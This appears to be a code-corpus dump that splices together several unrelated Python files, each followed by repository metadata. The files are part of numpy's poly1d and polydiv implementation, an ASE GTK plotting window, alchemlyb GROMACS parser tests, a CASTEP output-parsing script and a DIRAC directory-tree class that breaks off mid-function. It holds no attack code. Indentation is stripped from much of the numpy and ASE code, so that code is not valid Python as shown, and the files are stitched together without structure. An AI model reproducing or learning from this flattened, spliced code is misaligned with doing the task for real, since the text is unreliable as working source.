def _polydiv_dispatcher(u, v):
return (u, v)
@array_function_dispatch(_polydiv_dispatcher)
def polydiv(u, v):
"""
Returns the quotient and remainder of polynomial division.
The input arrays are the coefficients (including any coefficients
equal to zero) of the "numerator" (dividend) and "denominator"
(divisor) polynomials, respectively.
Parameters
----------
u : array_like or poly1d
Dividend polynomial's coefficients.
v : array_like or poly1d
Divisor polynomial's coefficients.
Returns
-------
q : ndarray
Coefficients, including those equal to zero, of the quotient.
r : ndarray
Coefficients, including those equal to zero, of the remainder.
See Also
--------
poly, polyadd, polyder, polydiv, polyfit, polyint, polymul, polysub
polyval
Notes
-----
Both `u` and `v` must be 0-d or 1-d (ndim = 0 or 1), but `u.ndim` need
not equal `v.ndim`. In other words, all four possible combinations -
``u.ndim = v.ndim = 0``, ``u.ndim = v.ndim = 1``,
``u.ndim = 1, v.ndim = 0``, and ``u.ndim = 0, v.ndim = 1`` - work.
Examples
--------
.. math:: \\frac{3x^2 + 5x + 2}{2x + 1} = 1.5x + 1.75, remainder 0.25
>>> x = np.array([3.0, 5.0, 2.0])
>>> y = np.array([2.0, 1.0])
>>> np.polydiv(x, y)
(array([1.5 , 1.75]), array([0.25]))
"""
    truepoly = (isinstance(u, poly1d) or isinstance(v, poly1d))
u = atleast_1d(u) + 0.0
v = atleast_1d(v) + 0.0
# w has the common type
w = u[0] + v[0]
m = len(u) - 1
n = len(v) - 1
scale = 1. / v[0]
q = NX.zeros((max(m - n + 1, 1),), w.dtype)
r = u.astype(w.dtype)
for k in range(0, m-n+1):
d = scale * r[k]
q[k] = d
r[k:k+n+1] -= d*v
while NX.allclose(r[0], 0, rtol=1e-14) and (r.shape[-1] > 1):
r = r[1:]
if truepoly:
return poly1d(q), poly1d(r)
return q, r
_poly_mat = re.compile(r"[*][*]([0-9]*)")
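# Helper for poly1d.__str__: lifts "**n" exponents in `astr` onto a
# superscript line above the terms, wrapping output at `wrap` columns.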
def _raise_power(astr, wrap=70):
n = 0
line1 = ''
line2 = ''
output = ' '
while True:
mat = _poly_mat.search(astr, n)
if mat is None:
break
span = mat.span()
power = mat.groups()[0]
partstr = astr[n:span[0]]
n = span[1]
toadd2 = partstr + ' '*(len(power)-1)
toadd1 = ' '*(len(partstr)-1) + power
if ((len(line2) + len(toadd2) > wrap) or
(len(line1) + len(toadd1) > wrap)):
output += line1 + "\n" + line2 + "\n "
line1 = toadd1
line2 = toadd2
else:
line2 += partstr + ' '*(len(power)-1)
line1 += ' '*(len(partstr)-1) + power
output += line1 + "\n" + line2
return output + astr[n:]
@set_module('numpy')
class poly1d(object):
"""
A one-dimensional polynomial class.
A convenience class, used to encapsulate "natural" operations on
polynomials so that said operations may take on their customary
form in code (see Examples).
Parameters
----------
c_or_r : array_like
The polynomial's coefficients, in decreasing powers, or if
the value of the second parameter is True, the polynomial's
roots (values where the polynomial evaluates to 0). For example,
``poly1d([1, 2, 3])`` returns an object that represents
:math:`x^2 + 2x + 3`, whereas ``poly1d([1, 2, 3], True)`` returns
one that represents :math:`(x-1)(x-2)(x-3) = x^3 - 6x^2 + 11x -6`.
r : bool, optional
If True, `c_or_r` specifies the polynomial's roots; the default
is False.
variable : str, optional
Changes the variable used when printing `p` from `x` to `variable`
(see Examples).
Examples
--------
Construct the polynomial :math:`x^2 + 2x + 3`:
>>> p = np.poly1d([1, 2, 3])
>>> print(np.poly1d(p))
2
1 x + 2 x + 3
Evaluate the polynomial at :math:`x = 0.5`:
>>> p(0.5)
4.25
Find the roots:
>>> p.r
array([-1.+1.41421356j, -1.-1.41421356j])
>>> p(p.r)
array([ -4.44089210e-16+0.j, -4.44089210e-16+0.j]) # may vary
These numbers in the previous line represent (0, 0) to machine precision
Show the coefficients:
>>> p.c
array([1, 2, 3])
Display the order (the leading zero-coefficients are removed):
>>> p.order
2
Show the coefficient of the k-th power in the polynomial
    (which is equivalent to ``p.c[-(k+1)]``):
>>> p[1]
2
Polynomials can be added, subtracted, multiplied, and divided
(returns quotient and remainder):
>>> p * p
poly1d([ 1, 4, 10, 12, 9])
>>> (p**3 + 4) / p
(poly1d([ 1., 4., 10., 12., 9.]), poly1d([4.]))
``asarray(p)`` gives the coefficient array, so polynomials can be
used in all functions that accept arrays:
>>> p**2 # square of polynomial
poly1d([ 1, 4, 10, 12, 9])
>>> np.square(p) # square of individual coefficients
array([1, 4, 9])
The variable used in the string representation of `p` can be modified,
using the `variable` parameter:
>>> p = np.poly1d([1,2,3], variable='z')
>>> print(p)
2
1 z + 2 z + 3
Construct a polynomial from its roots:
>>> np.poly1d([1, 2], True)
poly1d([ 1., -3., 2.])
This is the same polynomial as obtained by:
>>> np.poly1d([1, -1]) * np.poly1d([1, -2])
poly1d([ 1, -3, 2])
"""
__hash__ = None
@property
def coeffs(self):
""" The polynomial coefficients """
return self._coeffs
@coeffs.setter
def coeffs(self, value):
# allowing this makes p.coeffs *= 2 legal
if value is not self._coeffs:
raise AttributeError("Cannot set attribute")
@property
def variable(self):
""" The name of the polynomial variable """
return self._variable
# calculated attributes
@property
def order(self):
""" The order or degree of the polynomial """
return len(self._coeffs) - 1
@property
def roots(self):
""" The roots of the polynomial, where self(x) == 0 """
return roots(self._coeffs)
    # our internal _coeffs property needs to be backed by __dict__['coeffs']
    # for scipy to work correctly.
@property
def _coeffs(self):
return self.__dict__['coeffs']
@_coeffs.setter
def _coeffs(self, coeffs):
self.__dict__['coeffs'] = coeffs
# alias attributes
r = roots
c = coef = coefficients = coeffs
o = order
def __init__(self, c_or_r, r=False, variable=None):
if isinstance(c_or_r, poly1d):
self._variable = c_or_r._variable
self._coeffs = c_or_r._coeffs
if set(c_or_r.__dict__) - set(self.__dict__):
msg = ("In the future extra properties will not be copied "
"across when constructing one poly1d from another")
warnings.warn(msg, FutureWarning, stacklevel=2)
self.__dict__.update(c_or_r.__dict__)
if variable is not None:
self._variable = variable
return
if r:
c_or_r = poly(c_or_r)
c_or_r = atleast_1d(c_or_r)
if c_or_r.ndim > 1:
raise ValueError("Polynomial must be 1d only.")
c_or_r = trim_zeros(c_or_r, trim='f')
if len(c_or_r) == 0:
c_or_r = NX.array([0.])
self._coeffs = c_or_r
if variable is None:
variable = 'x'
self._variable = variable
def __array__(self, t=None):
if t:
return NX.asarray(self.coeffs, t)
else:
return NX.asarray(self.coeffs)
def __repr__(self):
vals = repr(self.coeffs)
vals = vals[6:-1]
return "poly1d(%s)" % vals
def __len__(self):
return self.order
def __str__(self):
thestr = "0"
var = self.variable
# Remove leading zeros
coeffs = self.coeffs[NX.logical_or.accumulate(self.coeffs != 0)]
N = len(coeffs)-1
def fmt_float(q):
s = '%.4g' % q
if s.endswith('.0000'):
s = s[:-5]
return s
for k in range(len(coeffs)):
if not iscomplex(coeffs[k]):
coefstr = fmt_float(real(coeffs[k]))
elif real(coeffs[k]) == 0:
coefstr = '%sj' % fmt_float(imag(coeffs[k]))
else:
coefstr = '(%s + %sj)' % (fmt_float(real(coeffs[k])),
fmt_float(imag(coeffs[k])))
power = (N-k)
if power == 0:
if coefstr != '0':
newstr = '%s' % (coefstr,)
else:
if k == 0:
newstr = '0'
else:
newstr = ''
elif power == 1:
if coefstr == '0':
newstr = ''
elif coefstr == 'b':
newstr = var
else:
newstr = '%s %s' % (coefstr, var)
else:
if coefstr == '0':
newstr = ''
elif coefstr == 'b':
newstr = '%s**%d' % (var, power,)
else:
newstr = '%s %s**%d' % (coefstr, var, power)
if k > 0:
if newstr != '':
if newstr.startswith('-'):
thestr = "%s - %s" % (thestr, newstr[1:])
else:
thestr = "%s + %s" % (thestr, newstr)
else:
thestr = newstr
return _raise_power(thestr)
def __call__(self, val):
return polyval(self.coeffs, val)
def __neg__(self):
return poly1d(-self.coeffs)
def __pos__(self):
return self
def __mul__(self, other):
if isscalar(other):
return poly1d(self.coeffs * other)
else:
other = poly1d(other)
return poly1d(polymul(self.coeffs, other.coeffs))
def __rmul__(self, other):
if isscalar(other):
return poly1d(other * self.coeffs)
else:
other = poly1d(other)
return poly1d(polymul(self.coeffs, other.coeffs))
def __add__(self, other):
other = poly1d(other)
return poly1d(polyadd(self.coeffs, other.coeffs))
def __radd__(self, other):
other = poly1d(other)
return poly1d(polyadd(self.coeffs, other.coeffs))
def __pow__(self, val):
if not isscalar(val) or int(val) != val or val < 0:
raise ValueError("Power to non-negative integers only.")
res = [1]
for _ in range(val):
res = polymul(self.coeffs, res)
return poly1d(res)
def __sub__(self, other):
other = poly1d(other)
return poly1d(polysub(self.coeffs, other.coeffs))
def __rsub__(self, other):
other = poly1d(other)
return poly1d(polysub(other.coeffs, self.coeffs))
def __div__(self, other):
if isscalar(other):
return poly1d(self.coeffs/other)
else:
other = poly1d(other)
return polydiv(self, other)
__truediv__ = __div__
def __rdiv__(self, other):
if isscalar(other):
return poly1d(other/self.coeffs)
else:
other = poly1d(other)
return polydiv(other, self)
__rtruediv__ = __rdiv__
def __eq__(self, other):
if not isinstance(other, poly1d):
return NotImplemented
if self.coeffs.shape != other.coeffs.shape:
return False
return (self.coeffs == other.coeffs).all()
def __ne__(self, other):
if not isinstance(other, poly1d):
return NotImplemented
return not self.__eq__(other)
def __getitem__(self, val):
ind = self.order - val
if val > self.order:
return 0
if val < 0:
return 0
return self.coeffs[ind]
def __setitem__(self, key, val):
ind = self.order - key
if key < 0:
raise ValueError("Does not support negative powers.")
if key > self.order:
zr = NX.zeros(key-self.order, self.coeffs.dtype)
self._coeffs = NX.concatenate((zr, self.coeffs))
ind = 0
self._coeffs[ind] = val
return
def __iter__(self):
return iter(self.coeffs)
def integ(self, m=1, k=0):
"""
Return an antiderivative (indefinite integral) of this polynomial.
Refer to `polyint` for full documentation.
See Also
--------
polyint : equivalent function
"""
return poly1d(polyint(self.coeffs, m=m, k=k))
def deriv(self, m=1):
"""
Return a derivative of this polynomial.
Refer to `polyder` for full documentation.
See Also
--------
polyder : equivalent function
"""
return poly1d(polyder(self.coeffs, m=m))
# Stuff to do on module import
warnings.simplefilter('always', RankWarning)
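# As a quick illustration of the interface implemented above (not part of the
# numpy source), a minimal poly1d session exercising the properties,
# operators, and calculus helpers:
import numpy as np

p = np.poly1d([1, -3, 2])   # x**2 - 3x + 2
print(p.order)              # 2, via the order property
print(p.r)                  # roots alias -> array([2., 1.])
print(p[2], p[0])           # __getitem__ maps power to coefficient: 1 2
print(p(0))                 # __call__ delegates to polyval -> 2
print((p * p).order)        # __mul__ uses polymul -> 4
print(p.deriv())            # polyder -> 2 x - 3
print(p.integ(k=5))         # polyint with integration constant 5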
|
jorisvandenbossche/numpy
|
numpy/lib/polynomial.py
|
Python
|
bsd-3-clause
| 40,755
|
[
"Gaussian"
] |
bab5a3759f1d02f9050ca47ebe448898922c9214d77bd5e5542972d1a097eef3
|
from math import sqrt
import gtk
from gettext import gettext as _
from ase.gui.widgets import pack, help
graph_help_text = _("""\
Help for plot ...
Symbols:
<c>e</c>:\t\t\t\ttotal energy
<c>epot</c>:\t\t\tpotential energy
<c>ekin</c>:\t\t\tkinetic energy
<c>fmax</c>:\t\t\tmaximum force
<c>fave</c>:\t\t\taverage force
<c>R[n,0-2]</c>:\t\t\tposition of atom number <c>n</c>
<c>d(n<sub>1</sub>,n<sub>2</sub>)</c>:\t\t\tdistance between two atoms <c>n<sub>1</sub></c> and <c>n<sub>2</sub></c>
<c>i</c>:\t\t\t\tcurrent image number
<c>E[i]</c>:\t\t\t\tenergy of image number <c>i</c>
<c>F[n,0-2]</c>:\t\t\tforce on atom number <c>n</c>
<c>V[n,0-2]</c>:\t\t\tvelocity of atom number <c>n</c>
<c>M[n]</c>:\t\t\tmagnetic moment of atom number <c>n</c>
<c>A[0-2,0-2]</c>:\t\tunit-cell basis vectors
<c>s</c>:\t\t\t\tpath length
<c>a(n1,n2,n3)</c>:\t\tangle between atoms <c>n<sub>1</sub></c>, <c>n<sub>2</sub></c> and <c>n<sub>3</sub></c>, centered on <c>n<sub>2</sub></c>
<c>dih(n1,n2,n3,n4)</c>:\tdihedral angle between <c>n<sub>1</sub></c>, <c>n<sub>2</sub></c>, <c>n<sub>3</sub></c> and <c>n<sub>4</sub></c>
<c>T</c>:\t\t\t\ttemperature (K)\
""")
class Graphs(gtk.Window):
def __init__(self, gui):
gtk.Window.__init__(self)
#self.window.set_position(gtk.WIN_POS_CENTER)
#self.window.connect("destroy", lambda w: gtk.main_quit())
#self.window.connect('delete_event', self.exit)
self.set_title('Graphs')
vbox = gtk.VBox()
self.expr = pack(vbox, [gtk.Entry(64),
help(graph_help_text)])[0]
self.expr.connect('activate', self.plot)
completion = gtk.EntryCompletion()
self.liststore = gtk.ListStore(str)
for s in ['fmax', 's, e-E[0]', 'i, d(0,1)']:
self.liststore.append([s])
completion.set_model(self.liststore)
self.expr.set_completion(completion)
completion.set_text_column(0)
button = pack(vbox, [gtk.Button(_('Plot')),
gtk.Label(' x, y1, y2, ...')])[0]
button.connect('clicked', self.plot, 'xy')
button = pack(vbox, [gtk.Button(_('Plot')),
gtk.Label(' y1, y2, ...')])[0]
button.connect('clicked', self.plot, 'y')
        save_button = gtk.Button(stock=gtk.STOCK_SAVE)
        save_button.connect('clicked', self.save)
        clear_button = gtk.Button(_('clear'))
        clear_button.connect('clicked', self.clear)
        pack(vbox, [save_button, clear_button])
self.add(vbox)
vbox.show()
self.show()
self.gui = gui
def plot(self, button=None, type=None, expr=None):
if expr is None:
expr = self.expr.get_text()
else:
self.expr.set_text(expr)
if expr not in [row[0] for row in self.liststore]:
self.liststore.append([expr])
data = self.gui.images.graph(expr)
import matplotlib
matplotlib.interactive(True)
matplotlib.use('GTKAgg')
#matplotlib.use('GTK', warn=False)# Not avail. in 0.91 (it is in 0.98)
import pylab
pylab.ion()
x = 2.5
self.gui.graphs.append(pylab.figure(figsize=(x * 2.5**0.5, x)))
i = self.gui.frame
m = len(data)
if type is None:
if m == 1:
type = 'y'
else:
type = 'xy'
if type == 'y':
for j in range(m):
pylab.plot(data[j])
pylab.plot([i], [data[j, i]], 'o')
else:
for j in range(1, m):
pylab.plot(data[0], data[j])
pylab.plot([data[0, i]], [data[j, i]], 'o')
pylab.title(expr)
#pylab.show()
python = plot
    def save(self, button):
chooser = gtk.FileChooserDialog(
_('Save data to file ... '), None, gtk.FILE_CHOOSER_ACTION_SAVE,
(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
save = chooser.run()
if save == gtk.RESPONSE_OK:
filename = chooser.get_filename()
expr = self.expr.get_text()
data = self.gui.images.graph(expr)
expr = '# '+expr
fd = open(filename,'w')
fd.write("%s \n" % (expr))
for s in range(len(data[0])):
for i in range(len(data)):
val = data[i,s]
fd.write("%12.8e\t" % (val))
fd.write("\n")
fd.close()
chooser.destroy()
def clear(self, button):
import pylab
for graph in self.gui.graphs:
pylab.close(graph)
self.gui.graphs = []
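To make the plotting dispatch above easier to follow in isolation, here is a
hedged, GTK-free sketch of the 'y' versus 'xy' logic from Graphs.plot;
plot_rows and the synthetic data array are illustrative names, not part of ASE:

import numpy as np
import matplotlib.pyplot as plt

def plot_rows(data, plot_type=None, frame=0):
    """Mimic Graphs.plot's 'y' vs 'xy' dispatch on an (m, n) array."""
    m = len(data)
    if plot_type is None:                        # same default rule as above
        plot_type = 'y' if m == 1 else 'xy'
    if plot_type == 'y':
        for j in range(m):
            plt.plot(data[j])                    # each row against its index
            plt.plot([frame], [data[j, frame]], 'o')
    else:
        for j in range(1, m):
            plt.plot(data[0], data[j])           # rows against the first row
            plt.plot([data[0, frame]], [data[j, frame]], 'o')

plot_rows(np.vstack([np.linspace(0, 1, 50), np.sin(np.linspace(0, 6, 50))]))
plt.show()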
|
grhawk/ASE
|
tools/ase/gui/graphs.py
|
Python
|
gpl-2.0
| 4,750
|
[
"ASE"
] |
64d2d47f53d858cfc08353f2cb04a446d5fc4b9f33afca21f4a680e91a07893f
|
"""Gromacs parser tests.
"""
from alchemlyb.parsing.gmx import extract_dHdl, extract_u_nk
from alchemtest.gmx import load_benzene
from alchemtest.gmx import load_expanded_ensemble_case_1, load_expanded_ensemble_case_2, load_expanded_ensemble_case_3
from alchemtest.gmx import load_water_particle_with_total_energy
from alchemtest.gmx import load_water_particle_with_potential_energy
from alchemtest.gmx import load_water_particle_without_energy
from numpy.testing import assert_almost_equal
def test_dHdl():
"""Test that dHdl has the correct form when extracted from files.
"""
dataset = load_benzene()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
dHdl = extract_dHdl(filename, T=300)
assert dHdl.index.names == ['time', 'fep-lambda']
assert dHdl.shape == (4001, 1)
def test_u_nk():
"""Test that u_nk has the correct form when extracted from files.
"""
dataset = load_benzene()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda']
if leg == 'Coulomb':
assert u_nk.shape == (4001, 5)
elif leg == 'VDW':
assert u_nk.shape == (4001, 16)
def test_u_nk_case1():
"""Test that u_nk has the correct form when extracted from expanded ensemble files (case 1).
"""
dataset = load_expanded_ensemble_case_1()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert u_nk.shape == (50001, 28)
def test_dHdl_case1():
"""Test that dHdl has the correct form when extracted from expanded ensemble files (case 1).
"""
dataset = load_expanded_ensemble_case_1()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
dHdl = extract_dHdl(filename, T=300)
assert dHdl.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert dHdl.shape == (50001, 4)
def test_u_nk_case2():
"""Test that u_nk has the correct form when extracted from expanded ensemble files (case 2).
"""
dataset = load_expanded_ensemble_case_2()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert u_nk.shape == (25001, 28)
def test_u_nk_case3():
"""Test that u_nk has the correct form when extracted from REX files (case 3).
"""
dataset = load_expanded_ensemble_case_3()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
assert u_nk.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert u_nk.shape == (2500, 28)
def test_dHdl_case3():
"""Test that dHdl has the correct form when extracted from REX files (case 3).
"""
dataset = load_expanded_ensemble_case_3()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
dHdl = extract_dHdl(filename, T=300)
assert dHdl.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert dHdl.shape == (2500, 4)
def test_u_nk_with_total_energy():
"""Test that the reduced potential is calculated correctly when the total energy is given.
"""
# Load dataset
dataset = load_water_particle_with_total_energy()
# Check if the sum of values on the diagonal has the correct value
assert_almost_equal(_diag_sum(dataset), 47611374980.34574, decimal=4)
# Check one specific value in the dataframe
assert_almost_equal(
extract_u_nk(dataset['data']['AllStates'][0], T=300).iloc[0][0],
-11211.577658852531,
decimal=6
)
def test_u_nk_with_potential_energy():
"""Test that the reduced potential is calculated correctly when the potential energy is given.
"""
# Load dataset
dataset = load_water_particle_with_potential_energy()
# Check if the sum of values on the diagonal has the correct value
assert_almost_equal(_diag_sum(dataset), 16674040406778.867, decimal=2)
# Check one specific value in the dataframe
assert_almost_equal(
extract_u_nk(dataset['data']['AllStates'][0], T=300).iloc[0][0],
-15656.557252200757,
decimal=6
)
def test_u_nk_without_energy():
"""Test that the reduced potential is calculated correctly when no energy is given.
"""
# Load dataset
dataset = load_water_particle_without_energy()
# Check if the sum of values on the diagonal has the correct value
assert_almost_equal(_diag_sum(dataset), 20572986867158.184, decimal=2)
# Check one specific value in the dataframe
assert_almost_equal(
extract_u_nk(dataset['data']['AllStates'][0], T=300).iloc[0][0],
0.0,
decimal=6
)
def _diag_sum(dataset):
"""Calculate the sum of diagonal elements (i, i)
"""
# Initialize the sum variable
ds = 0.0
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
# Calculate the sum of diagonal elements:
for i in range(len(dataset['data'][leg])):
ds += u_nk.iloc[i][i]
return ds
def test_extract_u_nk_unit():
    '''Test if extract_u_nk assigns the attrs correctly'''
dataset = load_benzene()
u_nk = extract_u_nk(dataset['data']['Coulomb'][0], 310)
assert u_nk.attrs['temperature'] == 310
assert u_nk.attrs['energy_unit'] == 'kT'
def test_extract_dHdl_unit():
    '''Test if extract_dHdl assigns the attrs correctly'''
dataset = load_benzene()
dhdl = extract_dHdl(dataset['data']['Coulomb'][0], 310)
assert dhdl.attrs['temperature'] == 310
assert dhdl.attrs['energy_unit'] == 'kT'
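# For orientation, a minimal sketch of the parser calls the tests above
# exercise; it assumes the alchemtest example data are installed, as the
# imports at the top of this file already require.
from alchemlyb.parsing.gmx import extract_dHdl, extract_u_nk
from alchemtest.gmx import load_benzene

dataset = load_benzene()
xvg = dataset['data']['Coulomb'][0]

dHdl = extract_dHdl(xvg, T=300)      # gradient estimates, indexed by (time, fep-lambda)
u_nk = extract_u_nk(xvg, T=300)      # reduced potentials, one column per lambda state
print(dHdl.index.names, dHdl.shape)  # ['time', 'fep-lambda'] (4001, 1), as asserted above
print(u_nk.attrs['energy_unit'])     # 'kT', as asserted in test_extract_u_nk_unit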
|
alchemistry/alchemlyb
|
src/alchemlyb/tests/parsing/test_gmx.py
|
Python
|
bsd-3-clause
| 6,231
|
[
"Gromacs"
] |
fd6eb5a77ead720ee0d6a75770de2d1eba2eb4b7db236f7a5a47c266fb83feac
|
#!/usr/bin/env python
"""
castep.py
Various bits of python to read/write castep files
Copyright (c) 2010 Andrew Walker (a.walker@ucl.ac.uk)
All rights reserved.
"""
import re
import scipy as S
version = 0.1
# regular expression to match the whole of the final cell from a .castep file
dotcastep_latt_RE = re.compile(r"""\sL?BFGS\s*:\sFinal\sConfiguration:\s*\n
=+\s*\n\s*\n\s+\-+\s*\n\s+Unit\sCell\s*\n\s+\-+\s*\n
\s+Real\sLattice\(A\)\s+Reciprocal\sLattice\(1/A\)\s*\n
\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s*\n
\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s*\n
\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s*\n""",
re.VERBOSE)
# Start of the 'final configuration'
dotcastep_infinal_RE = re.compile(r"BFGS\s*: Final Configuration:")
# Once inside the final configuration, this should only match a line with atoms
dotcastep_atomline_RE = re.compile(r"x\s+(\w+)\s+\d+\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+x")
# Get the point group number
dotcastep_pointgroup_RE = re.compile(r"^\s+Point group of crystal =\s+([\+\-]?\d+):")
def parse_dotcastep(seedname):
"""
Extract lattice and atom positions from a .castep
file. List of atoms may be empty (e.g. MgO)
"""
dotCastep = open(seedname+".castep","r")
# Find the lattice
latticeblock = dotcastep_latt_RE.findall(dotCastep.read())[-1] # Get the last block - handle concat restarts
lattice = []
lattice.append([float(latticeblock[0]), float(latticeblock[1]), float(latticeblock[2])])
lattice.append([float(latticeblock[6]), float(latticeblock[7]), float(latticeblock[8])])
lattice.append([float(latticeblock[12]), float(latticeblock[13]), float(latticeblock[14])])
    # rewind and search for the final atomic positions (these will be absent if e.g. they are all on symmetry positions)
dotCastep.seek(0)
in_atoms = False
pointgroup = None
atoms = []
for line in dotCastep:
        sym_line = dotcastep_pointgroup_RE.search(line)
atom_line = dotcastep_atomline_RE.search(line)
if (in_atoms and atom_line):
atoms.append([atom_line.group(1), float(atom_line.group(2)), \
float(atom_line.group(3)), float(atom_line.group(4))])
elif ((not in_atoms) and (dotcastep_infinal_RE.search(line))):
in_atoms = True
elif (sym_line):
pointgroup = int(sym_line.group(1))
dotCastep.close()
return (lattice, pointgroup, atoms)
# Regular expressions to match a lattice block in a castep .cell file. Note that these
# can be of the form %block lattice_abc or %block lattice_cart and are case insensitive
dotcell_lattice_start_RE = re.compile(r"^\s*%BLOCK\s+LATTICE_(?:CART|ABC)",re.IGNORECASE)
dotcell_lattice_end_RE = re.compile(r"^\s*%ENDBLOCK\s+LATTICE_(?:CART|ABC)",re.IGNORECASE)
dotcell_atoms_start_RE = re.compile(r"^\s*%BLOCK\s+POSITIONS_(?:FRAC|ABS)", re.IGNORECASE)
dotcell_atoms_end_RE = re.compile(r"^\s*%ENDBLOCK\s+POSITIONS_(?:FRAC|ABS)", re.IGNORECASE)
def produce_dotcell(seedname, filename, defcell, atoms):
"""
    produce_dotcell: reads <seedname>.cell (CASTEP cell file)
    and writes a new .cell file to <filename>, replacing the
    lattice block with a new crystallographic lattice <defcell>
    (which should be supplied as a list of three lists, each with
    three elements). Also adds a command to fix the cell during optimization.
"""
in_lattice = False
in_atoms = False
have_atoms = (atoms != []) # If we have an empty list, no atoms were optimized so just leave them in the .cell file.
inputfile = open(seedname+".cell", "r")
outputfile = open(filename, "w")
for line in inputfile:
if (dotcell_lattice_end_RE.search(line) and in_lattice):
in_lattice = False
elif (dotcell_lattice_start_RE.search(line) and not in_lattice):
outputfile.write("%block LATTICE_CART\n")
outputfile.write(str(defcell[0][0]) + " " + str(defcell[0][1]) + " " + str(defcell[0][2]) + "\n")
outputfile.write(str(defcell[1][0]) + " " + str(defcell[1][1]) + " " + str(defcell[1][2]) + "\n")
outputfile.write(str(defcell[2][0]) + " " + str(defcell[2][1]) + " " + str(defcell[2][2]) + "\n")
outputfile.write("%endblock LATTICE_CART\n")
outputfile.write("FIX_ALL_CELL true\n")
in_lattice = True
elif (dotcell_atoms_end_RE.search(line) and in_atoms and have_atoms):
in_atoms = False
elif ((dotcell_atoms_start_RE.search(line)) and (not in_atoms) and have_atoms):
outputfile.write("%block POSITIONS_FRAC\n")
for atom in atoms:
outputfile.write(" " + atom[0] + " " + str(atom[1]) + " " + str(atom[2]) + " " + str(atom[3]) + "\n")
outputfile.write("%endblock POSITIONS_FRAC\n")
in_atoms = True
elif(not (in_lattice or in_atoms)):
outputfile.write(line)
    inputfile.close()
    outputfile.close()
return()
# regular expression which matches the whole stress tensor block from a .castep file
stressRE = re.compile(r"\s\*+\s(?:Symmetrised\s)?Stress\sTensor\s\*+\n.+\n.+?\((\w+)\).+\n.+\n.+\n.+\n\s\*\s+x\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+\*\n\s\*\s+y\s+[\+\-]?\d+.\d+\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+\*\n\s\*\s+z\s+[\+\-]?\d+.\d+\s+[\+\-]?\d+.\d+\s+([\+\-]?\d+.\d+)\s+\*\n")
def get_stress_dotcastep(filename):
"""Extract the stress tensor from a .castep file
Returns a tuple of (<units>, <stress>) where <units>
is a string representing the stress units and
<stress> is a numpy vector of the elements of the
stress tensor in the order s(1,1), s(2,2), s(3,3)
s(3,2), s(3,1), s(2,1).
"""
dotCastep = open(filename,"r")
stressData = stressRE.findall(dotCastep.read())[0]
dotCastep.close()
units = stressData[0]
stress = S.array([float(stressData[1]),float(stressData[4]),
float(stressData[6]),float(stressData[5]),
float(stressData[3]),float(stressData[2])])
return(units, stress)
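# A small sketch of the Voigt-style reordering that get_stress_dotcastep
# applies to the regex groups. The stressData tuple below is fabricated to
# stand in for a real match, and numpy is used in place of the scipy alias
# in the file above:
import numpy as np

# Fabricated stand-in for stressRE.findall(...)[0]:
# (units, s_xx, s_xy, s_xz, s_yy, s_yz, s_zz)
stressData = ("GPa", "1.0", "0.4", "0.5", "2.0", "0.6", "3.0")
units = stressData[0]
# Same index shuffle as the function above: s11, s22, s33, s32, s31, s21
stress = np.array([float(stressData[1]), float(stressData[4]),
                   float(stressData[6]), float(stressData[5]),
                   float(stressData[3]), float(stressData[2])])
print(units, stress)   # GPa [1.  2.  3.  0.6 0.5 0.4]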
|
andreww/elastic-constants
|
castep.py
|
Python
|
bsd-3-clause
| 6,008
|
[
"CASTEP",
"CRYSTAL"
] |
4df9193002ee33afcba6820c82a42a330afce06ea45f4e9df72932c059d2b9fb
|
""" DIRAC FileCatalog component representing a directory tree with simple nodes
"""
import os
from DIRAC import S_OK, S_ERROR
from DIRAC.DataManagementSystem.DB.FileCatalogComponents.DirectoryManager.DirectoryTreeBase import DirectoryTreeBase
class DirectoryNodeTree(DirectoryTreeBase):
"""Class managing Directory Tree as a self-linked structure with directory
names stored in each node
"""
def __init__(self, database=None):
DirectoryTreeBase.__init__(self, database)
self.treeTable = "FC_DirectoryTreeM"
def findDir(self, path):
"""Find the identifier of a directory specified by its path"""
dpath = path
if path[0] == "/":
dpath = path[1:]
elements = dpath.split("/")
req = " "
for level in range(len(elements), 0, -1):
if level > 1:
req += "SELECT DirID from FC_DirectoryTreeM WHERE Level=%d AND DirName='%s' AND Parent=(" % (
level,
elements[level - 1],
)
else:
req += "SELECT DirID from FC_DirectoryTreeM WHERE Level=%d AND DirName='%s'" % (
level,
elements[level - 1],
)
req += ")" * (len(elements) - 1)
# print req
result = self.db._query(req)
# print "in findDir",result
if not result["OK"]:
return result
if not result["Value"]:
return S_OK(0)
